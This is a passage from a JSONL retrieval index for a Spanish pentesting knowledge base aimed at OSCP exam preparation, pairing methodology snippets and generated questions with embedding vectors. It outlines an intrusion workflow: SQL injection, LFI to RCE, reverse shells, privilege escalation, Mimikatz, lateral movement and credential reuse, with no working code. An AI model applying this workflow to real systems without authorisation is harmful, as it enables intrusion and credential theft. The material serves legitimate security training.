-0.03672, -0.0194, -0.00297, 0.00436, 0.1173, -0.04465, 0.04037, 0.09111, -0.00966, 0.00312, 0.07822, -0.069, -0.03444, -0.00243, 0.01708, -0.03504, -0.01676, 0.14566, -0.00863, -0.01446, -0.02758, 0.04727, 0.03588, -0.01686, -0.04569, 0.02094, -0.03452, -0.02384, -0.00333, -0.03356, 0.0276, -0.02736, -0.03428, -0.03381, 0.0157, -0.03054, 0.00485, 0.02006, -0.00139, -0.04332, 0.05123, -0.0066, 0.09595, -0.08536, 0.04575, 0.04799, 0.04981, -0.02319, 0.0169, -0.05975, -0.00191, 0.01048, -0.02331, -0.11754, 0.04361, -0.01879, 0.02216, 0.04258, -0.05623, -0.05291, -0.00076, -0.02021, 0.04317, -0.00216, 0.03854, -0.00959, 0.02024, 0.01828, 0.01814, -0.05616, 0.00853, -0.05112, -0.02514, 0.00133, -0.03183, 0.00958, -0.02094, 0.0168, 0.03825, 0.0472, 0.02779, -0.04146, -0.05128, 0.01913, -0.00806, 0.01266, -0.01976, -0.00668, -0.03448, 0.03229, 0.0508, -0.02931, 0.03319, 0.02074, 0.00705, -0.05348, -0.00554, -0.08327, 0.02713, -0.01729, -0.01227, -0.03654, -0.03385, -0.00564, -0.04548, -0.04994, -0.01024, -0.01322, 0.00584, -0.04704, -0.01853, 0.00539, -0.00014, -0.01039]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pasos\n1. **Enumera a fondo** β†’ EnumeraciΓ³n (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** β†’ web (EnumeraciΓ³n web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** β†’ Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** β†’ script automatizado (PEASS-ng) **+** revisiΓ³n manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** β†’ Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** β†’ Reporte OSCP.", "indexar": "quΓ© herramientas sirven para encontrar puertos olvidados en un sistema?", "v": [0.22736, 0.05436, -0.0765, -0.14371, -0.03539, -0.07234, 0.08554, -0.15961, -0.08443, -0.07316, -0.15933, 0.06602, 0.06142, -0.01581, 0.08019, -0.02161, 0.01101, -0.0545, 0.05645, -0.00183, -0.14348, 0.05011, -0.0642, -0.03217, -0.10065, 0.0157, 0.03021, -0.04444, -0.22112, 0.12662, -0.02427, 0.00821, 0.09186, -0.051, -0.07277, -0.10163, 0.05745, 0.07754, 0.05111, 0.06908, 0.16864, 0.03992, -0.01484, -0.01204, 0.11417, -0.13716, -0.04089, -0.00061, 0.07287, -0.0009, -0.10438, -0.0924, -0.11417, -0.04329, 0.06582, -0.13894, 0.09542, -0.00039, 0.00811, -0.08316, -0.11887, 0.07637, -0.01641, -0.05117, 0.0331, -0.04226, -0.05511, 0.01647, -0.0879, 0.08913, -0.03634, -0.04183, 0.06197, 0.02146, -0.02615, -0.05063, 0.07422, 0.06436, 0.02791, 0.03104, 0.03128, -0.0147, -0.09548, -0.06085, 0.04602, -0.02869, -0.02913, 0.06506, -0.02285, -0.12864, 0.10003, 0.00145, -0.00986, 0.10541, 0.00062, 0.05317, 0.00043, 0.03397, -0.02533, 0.06499, 0.0767, 0.01756, -0.02147, 0.07178, -0.10253, -0.02439, 0.01049, 0.00098, 0.02582, -0.00701, 0.07733, 0.04542, 0.08754, -0.02694, -0.02132, 0.05507, 0.03071, -0.09105, -0.01452, -0.0082, 0.06866, 0.01129, -0.04128, -0.06895, 0.01553, 0.03116, 0.04853, 0.05543, 0.12257, -0.01643, 0.09935, -0.06241, -0.09488, -0.06934, 0.00512, -0.03962, 0.0518, -0.02551, -0.08663, 0.00869, -0.03625, 0.1051, -0.08607, -0.07794, 0.04117, 0.01709, 0.14671, -0.01168, -0.01641, -0.10547, -0.06362, 0.02411, 9e-05, -0.03134, -0.03281, -0.02682, 0.09582, -0.05459, -0.09593, -0.03215, -0.02404, -0.01716, -0.02348, 0.01829, 0.06672, -0.02921, 0.00531, 0.0586, 0.0604, 0.0094, 0.03839, 0.07666, 0.02742, -0.06657, -0.0291, -0.00588, -0.03927, -0.09171, -0.02414, 0.0367, -0.06609, 0.05123, -0.06291, 0.03028, 0.0084, -0.10428, 0.03273, -0.09513, 0.00622, 0.08345, 0.04664, -0.04825, 0.00087, -0.00971, 0.01395, 0.05505, -0.0014, -0.00707, -0.00864, -0.0262, -0.01458, 0.04971, 0.05041, -0.04516, 0.00806, 0.03662, -0.02675, 0.01048, -0.01215, 0.06469, -0.01414, 0.01543, 0.02928, -0.04534, -0.04541, 0.02857, -0.08268, 0.06223, 0.03099, 0.00014, -0.02135, -0.02222, -0.01579, 0.05922, -0.01191, 0.03645, -0.00058, 0.0666, -0.0284, -0.03067, 0.00259, -0.09653, -0.04664, 0.00731, -0.01932, -0.02713, -0.03746, -0.03514, -0.02303, 0.01789, 0.02737, 0.01653, 0.02604, -0.02014, -0.02466, -0.08964, -0.0054, -0.0351, -0.02366, -0.03735, -0.03926, 0.02642, 0.02996, -0.0168, 0.0197, -0.08469]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pasos\n1. **Enumera a fondo** β†’ EnumeraciΓ³n (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** β†’ web (EnumeraciΓ³n web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** β†’ Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** β†’ script automatizado (PEASS-ng) **+** revisiΓ³n manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** β†’ Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** β†’ Reporte OSCP.", "indexar": "con quΓ© puedo automatizar la enumeraciΓ³n de vulnerabilidades web como inyecciones SQL o subida de archivos?", "v": [-0.03771, -0.03913, -0.06357, -0.09341, 0.05734, -0.15679, -0.13065, -0.18933, -0.07575, -0.02932, -0.13874, -0.20639, 0.00851, -0.0157, -0.06258, 0.06893, 0.02167, -0.14436, -0.00794, 0.02735, 0.1307, -0.05494, 0.08139, -0.10369, -0.04933, -0.01134, 0.03363, 0.15372, -0.06315, -0.1046, -0.12592, 0.01558, -0.00557, 0.09527, 0.02561, 0.06583, 0.05916, 0.12221, -0.03418, -0.10906, -0.0284, 0.02281, -0.15792, -0.04321, 0.067, -0.03476, 0.02869, -0.03595, 0.07053, -0.05887, -0.09799, -0.01783, -0.1165, -0.15885, -0.0551, 0.0184, 0.08307, -0.03165, 0.11494, 0.00959, -0.09358, 0.08822, 0.01792, 0.04989, -0.08527, -0.01172, -0.03758, -0.02439, -0.01785, 0.12085, 0.01117, -0.04239, -0.03656, 0.00156, 0.08123, -0.02094, 0.00818, 0.00707, -0.0957, 0.03688, -0.09768, -0.0213, -0.01084, 0.1094, -0.05095, -0.03196, 0.09562, 0.00331, 0.04599, 0.00187, 0.14868, -0.05713, 0.04423, -0.02292, -0.00653, -0.0554, 0.05595, -0.10252, -0.06194, -0.01679, -0.10816, -0.05443, -0.04839, 0.23509, 0.13844, 0.15953, 0.04626, 0.06095, -0.0269, -0.11859, 0.07038, -0.00381, -0.03027, -0.00648, -0.05498, 0.0676, 0.00751, 0.05727, -0.01339, -0.02873, 0.00819, -0.03258, 0.03199, 0.01926, -0.03196, -0.0164, 0.03196, 0.09365, -0.08676, -0.07735, 0.00571, 0.04073, -0.04396, -0.04104, -0.05248, 0.09657, 0.03101, -0.07465, -0.04407, -0.05287, 0.01542, 0.00923, -0.01392, 0.04142, 0.08679, -0.01087, -0.02554, 0.00616, -0.11316, -0.02065, -0.00763, -0.04536, 0.03071, 0.01833, 0.01646, 0.03332, 0.01491, -0.08326, -0.04351, 0.0705, -0.00598, 0.03646, -0.02757, 0.07013, -0.01856, 0.01674, 0.05186, 0.02484, 0.00142, -0.04138, 0.01175, 0.04711, 0.02643, -0.10212, 0.04432, 0.01234, -0.03615, -0.02267, 0.04171, -0.05509, -0.01047, -0.05676, 0.03343, 0.01747, -0.00914, -0.00776, 0.0555, -0.03425, 0.03214, 0.02823, -0.08258, -0.0312, -0.06425, -0.03639, 0.06157, -0.02823, -0.03072, 0.02239, 0.01194, -0.03361, -0.04948, -0.06193, -0.07032, -0.02382, 0.03309, 0.04699, 0.00682, 0.02974, 0.04621, -0.00242, -0.03831, -0.0085, 0.08321, -0.03652, 0.01115, -0.0201, 0.00535, 0.05894, -0.00822, -0.06579, -0.01006, 0.01757, 0.02619, 0.02782, -0.03331, -0.01859, -0.02281, -0.04661, 0.02626, 0.05664, -0.02985, 0.0001, -0.01992, 0.00461, 0.01231, 0.01781, 0.00445, -0.00694, -0.03152, -0.01384, 0.03188, 0.08728, 0.01827, -0.0468, -0.0307, -0.05024, -0.04336, 0.01147, -0.01889, -0.02818, -0.03554, -0.01875, -0.06973, 0.0079, -0.01055, -0.02368]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pasos\n1. **Enumera a fondo** β†’ EnumeraciΓ³n (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** β†’ web (EnumeraciΓ³n web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** β†’ Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** β†’ script automatizado (PEASS-ng) **+** revisiΓ³n manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** β†’ Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** β†’ Reporte OSCP.", "indexar": "existen scripts que me ayuden a obtener acceso raΓ­z y moverme lateralmente por Active Directory?", "v": [-0.01633, 0.08179, -0.19141, -0.26755, -0.07477, -0.01213, -0.16564, 0.08737, -0.11837, 0.02794, -0.0168, -0.16251, -0.01639, -0.08796, 0.12442, -0.00733, 0.07749, -0.04217, -0.12087, 0.0007, 0.08826, 0.05311, -0.03231, 0.07723, 0.06131, 0.09472, 0.11627, -0.07722, -0.04791, -0.06678, 0.01085, 0.11448, 0.08352, 0.0276, -0.02614, -0.12329, -0.00662, 0.028, 0.04311, 0.10493, -0.11688, -0.00765, -0.14993, 0.08412, -0.02573, 0.07045, -0.06301, -0.00218, -0.00619, 0.04341, 0.06517, -0.05926, -0.06546, -0.07044, -0.0545, 0.06577, 0.05886, -0.1138, -0.05226, 0.01157, -0.06144, -0.01834, -0.07908, -0.02667, -0.03858, -0.06054, 0.13178, -0.12644, -0.14119, 0.05067, -0.08088, 0.07966, -0.02907, 0.08239, 0.04744, 0.03991, -0.0115, -0.1113, -0.05636, 0.11814, 0.06036, 0.02328, -0.02322, 0.03103, -0.04319, -0.19708, -0.02213, -0.07838, -0.01657, -0.05169, 0.17928, 0.01177, -0.10404, 0.03472, -0.04659, 0.05735, -0.04727, -0.03111, 0.02154, 0.00569, -0.03856, -0.03453, 0.06514, 0.02367, 0.05546, 0.05999, 0.0713, 0.03243, -0.03229, 0.05186, 0.01047, 0.0169, 0.01561, -0.02784, 0.00894, 0.02928, -0.12687, -0.00568, 0.00169, 0.00394, -0.01149, -0.06852, -0.03215, -0.03288, -0.0002, -0.04527, -0.02694, 0.00873, -0.06568, 0.05503, -0.00521, -0.03205, -0.01381, -0.16944, -0.113, 0.01541, 0.07841, 0.09204, 0.05235, -0.05634, 0.03178, -0.00805, 0.02914, 0.00755, 0.03375, -0.0036, 0.04022, 0.03894, -0.00405, 0.00877, -0.01326, -0.00551, 0.03287, 0.02551, 0.03298, 0.01938, 0.02608, 0.02938, -0.11605, 0.04611, 0.01325, 0.06643, -0.12284, -0.05363, -0.05952, -0.10027, -0.06141, 0.04582, 0.06387, 0.08394, -0.03756, 0.04949, 0.03104, -0.05214, 0.02155, -0.03751, -0.04563, -0.08521, -0.01556, 0.00374, 0.06734, -0.0161, 0.02313, 0.00981, -0.00147, 0.03313, 0.00652, -0.00191, -0.02013, 0.04887, 0.05286, 0.07075, -0.0926, -0.04663, -0.02607, -0.01837, -0.02893, -0.00867, 0.02427, -0.04404, -0.04494, 0.04914, 0.06894, 0.01605, 0.06928, -0.00158, -0.02009, -0.00198, 0.00974, -0.01709, -0.02119, 0.0184, 0.06878, 0.03708, -0.04107, -0.02308, 0.01826, 0.02265, -0.00473, -0.04822, -0.01472, 0.0249, 0.03014, -0.06347, 0.01401, -0.00304, 0.01972, 0.01625, -0.03359, 0.04375, 0.02903, -0.03329, 0.00828, -0.03586, 0.01934, -0.02739, 0.0045, -0.02658, -0.03522, -0.015, 0.00734, 0.01916, 0.01981, -0.06405, -0.03081, -0.05351, -0.03458, 0.0228, 0.00586, 0.04345, 0.03427, -0.01901, 0.01863, -0.0357, 0.0398, 0.01445]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas de oro\n- **Reutiliza credenciales** siempre: una pass de un user suele valer en otros hosts y servicios.\n- **1.5h sin progreso = cambia de mΓ‘quina** (ver GestiΓ³n del tiempo).\n- Captura todo mientras lo haces, no al final.\n\nRelacionado: Estructura del examen Β· Reglas de herramientas Β· OSCP MOC", "indexar": "ΒΏhay alguna forma de reutilizar credenciales entre diferentes servicios?", "v": [-0.32267, 0.10713, -0.12064, 0.17544, 0.08953, -0.09983, 0.00873, -0.05217, -0.0145, -0.17173, -0.17333, -0.08505, -0.00615, -0.00311, 0.07751, 0.10613, 0.05387, -0.00895, 0.09761, -0.05043, -0.02396, -0.09538, -0.0891, 0.03154, -0.16848, -0.03926, 0.04211, -0.10937, -0.01901, 0.07231, 0.00796, 0.02955, -0.05358, -0.07903, -0.15726, 0.07914, 0.04984, 0.07827, -0.01537, 0.04997, -0.03813, -0.06528, -0.0056, 0.02457, 0.08911, 0.08592, -0.13233, -0.01962, 0.0005, -0.02239, 0.02007, -0.07706, -0.14073, 0.00157, 0.02302, -0.04248, -0.04145, -0.01735, -0.01131, -0.09124, -0.05562, 0.00481, -0.02152, 0.07791, 0.12706, -0.09349, -0.08119, -0.08177, -0.08318, 0.08327, -0.09766, -0.07258, 0.03354, -0.0151, -0.03854, 0.01113, 0.0146, -0.07114, -0.03672, 0.11369, 0.06821, 0.02007, -0.0167, -0.01266, 0.00649, 0.03105, 0.01083, -0.01979, -0.00634, 0.01976, 0.03311, 0.08556, -0.08599, 0.08484, -0.18089, 0.08558, -0.07613, 0.01925, -0.03013, 0.04078, 0.02069, -0.05116, 0.01474, 0.0641, -0.08846, 0.08233, -0.01451, -0.07453, 0.0087, -0.0021, 0.03967, 0.02549, -0.00898, -0.03961, -0.05357, -0.01334, -0.01898, -0.0371, 0.04136, -0.04964, 0.02375, -0.07682, 0.09407, 0.03094, 0.03664, 0.02686, -0.06364, 0.05837, -0.06064, 0.00892, -0.01362, 0.02227, -0.11456, -0.04071, 0.08711, -0.07715, 0.05761, -0.0435, -0.02596, 0.01319, 0.05343, 0.02601, -0.02723, 0.03134, -0.05964, -0.05102, 0.05442, -0.08076, -0.01448, -0.08018, 0.0272, 0.1269, 0.04231, -0.01325, 0.01224, 0.01578, 0.04146, -0.05529, -0.01804, 0.05906, -0.08677, -0.04153, 0.11142, -0.00416, -0.01026, -0.03091, -0.02477, -0.04773, 0.01068, 0.07156, -0.01493, 0.01135, -0.04846, -0.0119, 0.01006, 0.04934, -0.0985, -0.03637, 0.00665, -0.071, 0.05026, 0.05695, -0.07106, 0.03068, 0.01268, 0.00917, -0.07057, 0.08252, -0.04673, -0.03493, 0.05308, -0.03844, -0.06519, 0.01134, -0.01373, -0.03898, 0.02735, -0.04642, -0.02906, 0.02486, -0.07481, -0.0278, -0.02109, 0.02351, -0.02359, 0.02103, 0.00639, 0.04075, 0.0353, 0.04747, 0.03476, -0.04673, 0.08219, -0.02238, -0.07974, -0.01486, 0.02615, -0.03131, 0.04552, -0.04448, -0.01073, -0.01972, -0.02283, -0.01863, 0.0196, 0.00052, 0.10076, 0.00076, -0.00709, 0.0334, -0.0081, 0.01738, -0.01236, -0.05577, 0.00607, -0.01824, 0.04518, -0.03938, 0.05383, -0.10978, 0.06332, 0.03781, -0.02702, 0.02724, 0.00324, 0.04203, -0.02968, 0.04095, -0.01359, -0.0088, -0.01314, 0.01263, -0.02625, 0.00488, -0.01206, -0.04152]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas de oro\n- **Reutiliza credenciales** siempre: una pass de un user suele valer en otros hosts y servicios.\n- **1.5h sin progreso = cambia de mΓ‘quina** (ver GestiΓ³n del tiempo).\n- Captura todo mientras lo haces, no al final.\n\nRelacionado: Estructura del examen Β· Reglas de herramientas Β· OSCP MOC", "indexar": "cual es la mejor tΓ©cnica para capturar todo lo que hago en tiempo real sin esperar al final?", "v": [-0.00603, 0.04518, -0.12564, 0.10471, 0.05221, -0.12006, 0.01141, 0.0807, 0.05904, 0.03229, -0.05231, -0.10879, -0.00499, 0.08105, 0.00767, 0.06408, 0.02714, 0.04126, 0.11743, 0.03047, -0.02158, -0.00642, -0.10765, -0.12141, 0.04657, -0.16424, 0.12565, 0.08507, -0.24391, -0.05823, 0.07043, 0.09354, 0.05872, -0.03385, 0.0085, -0.01647, 0.08739, 0.10968, -0.07328, 0.03956, 0.06141, -0.00124, -0.06074, 0.00968, 0.10491, -0.07851, 0.13026, 0.0734, -0.03181, -0.04273, 0.02157, 0.12386, 0.00283, -0.03733, -0.09889, -0.1202, 0.10708, -0.0867, 0.06388, -0.1119, -0.04591, -0.00884, -0.0082, 0.00638, 0.06948, -0.04306, -0.01262, 0.00168, -0.0113, -0.02729, 0.01796, 0.02259, 0.03041, 0.01277, 0.00179, 0.04418, -0.02813, -0.00136, 0.03979, -0.09976, -0.01646, -0.04968, -0.09494, 0.00991, -0.06472, -0.0471, 0.05704, -0.10809, -0.0327, -0.18992, 0.04391, 0.05442, 0.02957, -0.03, 0.06639, -0.08589, 0.00989, 0.00387, -0.00757, 0.06858, 0.0621, -0.02249, -0.09178, -0.00063, -0.01509, 0.07581, 0.01194, -0.05293, -0.01894, -0.028, -0.09813, 0.10076, -0.07269, 0.04884, -0.0249, -0.04272, 0.00783, -0.16568, -0.08399, -0.02803, -0.02269, 0.03056, -0.06863, -0.09476, 0.10374, 0.01281, -0.02849, -0.07285, 0.06002, -0.04002, -0.04845, -0.02126, -0.11456, -0.03352, -0.02613, -0.04496, 0.13164, 0.03778, -0.03251, -0.0821, -0.08229, -0.00353, -0.06034, -0.08884, -0.00752, 0.02299, -0.01023, -0.01975, -0.0624, -0.10911, 0.07597, -0.04477, 0.07791, 0.03672, -0.04229, 0.05074, -0.01931, -0.01879, -0.00827, 0.06981, 0.06166, 0.01829, -0.02785, -0.12414, -0.0814, -0.10544, -0.03523, -0.02273, 0.0453, -0.02294, 0.0622, -0.01667, -0.08726, -0.013, 0.0033, -0.00784, 0.00874, 0.00762, 0.00805, -0.11469, -0.03088, 0.0531, 0.06901, 0.00078, 0.05569, -0.00829, -0.04679, 0.0355, -0.01907, 0.00194, 0.03198, -0.08405, 0.0082, 0.0772, -0.05429, -0.07628, 0.02761, 0.00763, 0.04235, 0.00237, -0.01516, -0.08797, -0.01223, 0.05209, -0.02536, 0.01687, -0.05608, 0.05332, -0.05824, -0.01855, -0.02004, 0.04303, 0.00463, -0.05717, -0.00118, -0.03702, 0.00922, -0.03877, -0.05603, 0.01506, 0.03603, 0.03813, 0.01943, 0.04264, -0.0615, -0.02083, 0.01336, 0.07977, -0.02606, -0.02162, -0.02398, 0.05989, 0.01858, 0.01413, 0.00245, 0.01533, 0.05681, -0.04328, -0.02192, -0.09496, 0.05627, 0.06697, -0.00577, 0.00071, -0.04715, 0.02703, -0.14058, 0.00933, 0.01982, -0.1142, 0.00857, 0.00754, 0.07676, 0.00857, 0.06838, -0.0315]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "quΓ© programa me sirve para capturar comandos y flags en tiempo real durante una intrusiΓ³n?", "v": [0.08725, 0.15805, -0.1475, -0.06145, 0.05634, -0.10149, 0.02618, 0.01393, 0.03213, -0.02454, -0.06661, -0.04366, 0.05527, -0.05477, -0.01735, 0.11467, 0.07946, 0.03218, 0.03101, 0.01347, -0.02559, -0.04604, 0.01009, -0.12187, -0.03736, -0.05686, 0.08281, 0.01955, -0.09883, -0.1174, 0.03404, 0.06476, 0.07087, -0.0909, -0.05482, -0.17551, -0.04288, 0.09238, -0.04843, 0.13716, 0.0375, 0.03655, -0.15211, 0.03975, 0.06382, -0.12836, 0.05982, 0.02115, 0.06955, -0.05841, -0.02416, -0.01403, -0.02296, 0.01104, -0.07051, -0.09482, 0.07594, -0.0932, -0.00683, -0.01733, -0.11763, -0.02212, 0.02248, 0.06254, 0.06743, -0.04344, 0.01779, -0.07798, 0.0174, 0.0329, -0.01927, -0.00899, -0.00817, -0.04202, 0.00885, 0.00361, -0.06734, -0.1059, 0.15313, -0.08281, -0.01922, -0.04315, -0.05414, 0.07219, -0.06948, -0.04917, 0.01898, -0.08591, -0.09043, -0.12675, 0.02933, 0.11377, 0.04598, 0.0273, 0.08366, 0.00964, -0.00569, 0.01985, 0.09598, 0.09064, 0.05485, -0.09751, -0.16916, 0.12587, -0.06416, 0.08463, 0.03828, -0.07147, 0.01316, 0.01467, -0.02939, -0.04546, -0.06598, -0.00359, -0.02224, -0.04318, 0.02432, -0.13923, 0.04906, -0.09135, -0.18063, -0.00241, 0.03454, 0.03064, 0.10226, 0.00028, -0.10188, -0.02538, 0.05397, 0.03045, -0.06949, 0.03068, 0.05682, -0.01935, -0.06444, -0.03949, 0.03995, -0.00807, -0.1177, -0.12105, 0.04764, 0.02425, 0.00669, -0.01624, 0.02348, 0.05456, 0.00872, -0.02443, -0.05075, 0.04569, 0.04474, 0.00787, 0.00874, 0.08154, 0.01862, -0.03391, 0.01075, -0.02859, -0.10384, 0.08647, 0.00345, 0.02699, -0.04593, -0.0679, 0.04661, -0.12381, -0.03587, -0.01408, 0.05738, 0.07462, -0.03173, 0.06238, 0.05279, -0.11923, -0.03718, 0.00431, -0.01058, -0.05331, 0.02578, -0.09398, -0.06672, 0.12896, 0.07717, 0.00719, 0.03408, -0.05496, -0.03304, 0.06002, -0.00358, -0.01747, 0.0188, -0.00379, -0.0358, 0.02466, -0.05697, -0.03917, 0.01542, 0.0183, 0.01339, -0.04422, -0.03763, -0.03061, 0.01083, -0.03548, 0.06176, 0.0712, -0.04652, 0.07932, 0.01906, 0.02859, 0.01341, 0.02873, 0.08946, -0.01323, -0.03203, -0.03986, 0.06013, 0.05608, -0.01752, -0.04127, 0.05242, 0.06929, 0.02749, 0.04916, -0.05599, -0.02823, -0.0137, 0.02661, 0.02601, 0.0093, -0.01705, 0.0033, -0.05317, -0.02383, -0.00516, -0.02818, -0.02738, -0.02687, -0.02609, -0.12063, 0.02642, 0.06056, -0.02845, -0.07482, -0.02375, -0.0452, -0.0388, 0.01516, 0.05152, -0.03398, -0.07055, 0.0542, 0.0269, -0.03627, 0.05053, 0.00491]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "con quΓ© puedo grabar los archivos local.txt y proof.txt junto con la configuraciΓ³n de red al instante?", "v": [0.15518, 0.07505, -0.1256, -0.05699, 0.14839, -0.08984, -0.03264, 0.03854, 0.09941, 0.10393, -0.04865, -0.06755, 0.08156, 0.05179, 0.13622, 0.08808, 0.03815, -0.05117, 0.04381, -0.0636, 0.04985, -0.05949, 0.07749, -0.03365, 0.08489, -0.0545, 0.05551, 0.00176, -0.17034, -0.00432, -0.0143, -0.03749, 0.0135, -0.05308, -0.11622, 0.0917, 0.09038, 0.11965, -0.10897, 0.07954, 0.03396, 0.04324, -0.09828, 0.12115, -0.04758, -0.05708, 0.01217, -0.00163, -0.01965, -0.05819, -0.00245, -0.10373, -0.03574, -0.02456, -0.10979, -0.02295, 0.134, -0.15475, 0.03961, 0.00847, -0.01272, 0.05795, -0.11342, 0.00884, -0.03012, 0.04046, 0.04025, 0.06859, -0.1712, 0.0151, -0.02339, 0.13229, 0.01079, -0.01353, 0.02972, 0.03373, -0.07531, -0.11034, -0.00038, -0.00767, -0.0401, -0.02812, -0.04738, -0.06205, -0.03408, -0.03972, 0.01453, -0.06425, -0.00265, -0.06353, 0.12366, -0.09887, 0.03951, 0.06412, 0.13951, -0.11324, 0.15344, -0.00261, -0.02235, 0.00561, -0.02045, 0.0398, -0.10504, 0.04877, 0.08306, 0.02579, 0.00631, 0.03697, 0.0915, -0.03199, 0.05571, 0.06674, -0.01356, 0.01866, -0.05163, -0.18763, 0.03265, -0.06199, -0.09556, -0.04247, 0.01035, -0.01815, -0.03807, -0.0023, -0.0506, -0.03203, -0.05691, 0.04388, -0.00222, 0.09581, -0.01848, 0.01255, 0.01647, -0.13358, -0.05508, 0.03577, 0.00524, 0.0863, -0.03071, -0.06447, 0.04336, 0.00861, 0.00213, 0.0269, 0.10056, 0.04077, -0.033, -0.04748, -0.0545, 0.02922, -0.00553, 0.05256, -0.03218, -0.01398, -0.05618, 0.0657, 0.05258, -0.07022, -0.03, -0.01228, -0.00937, -0.03731, -0.06038, -0.01046, -0.0426, -0.02961, -0.01806, 0.06229, 0.04095, -0.02767, 0.00471, -0.01363, 0.02408, -0.14838, 0.0131, -0.06276, 0.00065, -0.07069, 0.06709, -0.05076, -0.00974, 0.02535, 0.00633, 0.05596, -0.02808, -0.01083, 0.04562, 0.0173, 0.01182, -0.00415, -0.01509, 0.01182, -0.01906, 0.01816, 0.00755, -0.03578, -0.09043, 0.0269, -0.02344, 0.00614, -0.08473, -0.02343, -0.03671, 0.00119, 0.05328, 0.03857, -0.1056, 0.06108, -0.03604, -0.04628, -0.02076, 0.074, 0.01905, -0.00024, -0.04007, -0.00982, 0.01687, 0.04418, -0.00657, 0.02538, 0.06866, 0.00685, 0.11241, -0.00368, -0.03241, 0.01557, 0.05249, -0.01419, 0.05026, 0.05897, -0.02371, 0.04307, -0.08486, 0.01292, 0.07064, 0.02428, -0.00392, 0.00697, -0.03615, -0.10712, 0.02302, 0.11962, -0.08322, -0.04983, -0.01641, -0.02561, -0.10104, 0.04848, 0.04699, -0.07524, -0.03514, 0.04672, 0.04304, -0.017, 0.00277, -0.04428]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "cual es una herramienta que permita documentar pasos exactos para reproducir un ataque informΓ‘tico?", "v": [0.05966, 0.06622, -0.17075, -0.1885, 0.05565, -0.13421, 0.02287, -0.00062, -0.15015, 0.03428, 0.08119, -0.07246, -0.06504, -0.08132, 0.06609, -0.05574, 0.13959, -0.03551, 0.04018, -0.04276, 0.00354, -0.02639, -0.03963, -0.01462, -0.04043, -0.05235, -0.0628, 0.07181, -0.12335, -0.05327, 0.02647, 0.07943, -0.01793, -0.0789, -0.08303, -0.09923, -0.04742, -0.0069, -0.02348, 0.0923, -0.09012, -0.0181, -0.1485, 0.12358, 0.05129, -0.02138, -0.02711, 0.00626, 0.0591, -0.02121, 0.06643, -0.01609, -0.13503, -0.05863, -0.03213, -0.19325, 0.17607, -0.12817, 0.08125, -0.08473, -0.04798, 0.09346, -0.033, -0.03903, 0.01436, -0.00962, 0.07031, -0.11451, -0.0498, 0.06554, -0.02732, 0.06708, -0.00035, 0.03422, -0.02439, -0.00632, -0.0154, -0.0383, 0.02453, -0.02115, 0.00455, -0.08494, -0.02605, -0.01052, -0.13642, -0.05304, 0.08298, 0.04864, -0.00229, -0.09907, -0.02987, 0.08592, -0.03401, -0.01296, 0.08785, -0.01288, 0.13262, -0.00806, -0.1027, 0.04234, -0.00989, -0.06482, -0.14892, 0.06082, -0.00088, 